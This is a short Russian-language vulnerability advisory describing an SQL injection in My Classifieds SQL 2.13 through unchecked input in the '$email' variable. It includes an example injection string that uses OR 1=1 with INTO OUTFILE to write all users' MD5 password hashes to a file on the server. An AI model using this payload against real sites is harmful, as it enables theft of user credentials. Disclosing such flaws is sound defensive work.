Программа: My Classifieds SQL 2.13 

Уязвимость обнаружена в My Classifieds SQL. Злонамеренный пользователь может выполнить нападение SQL инъекции. 

Уязвимость связанна с ошибкой проверки правильности данных, представленных в переменной «$email». В результате злонамеренный пользователь может манипулировать существующим SQL запросом и раскрыть потенциально чувствительные данные, типа паролей пользователей системы. 

Пример/Эксплоит: 

Если $email сделать aaa@aaa.com’ OR 1=1 INTO OUTFILE ‘/<directory-path>/pass.txt,
тогда SQL запрос будет выглядеть так:

select passmd5 from people where email=’ aaa@aaa.com’ OR 1=1 INTO OUTFILE ‘/<directory-path>/pass.txt’



Оставить мнение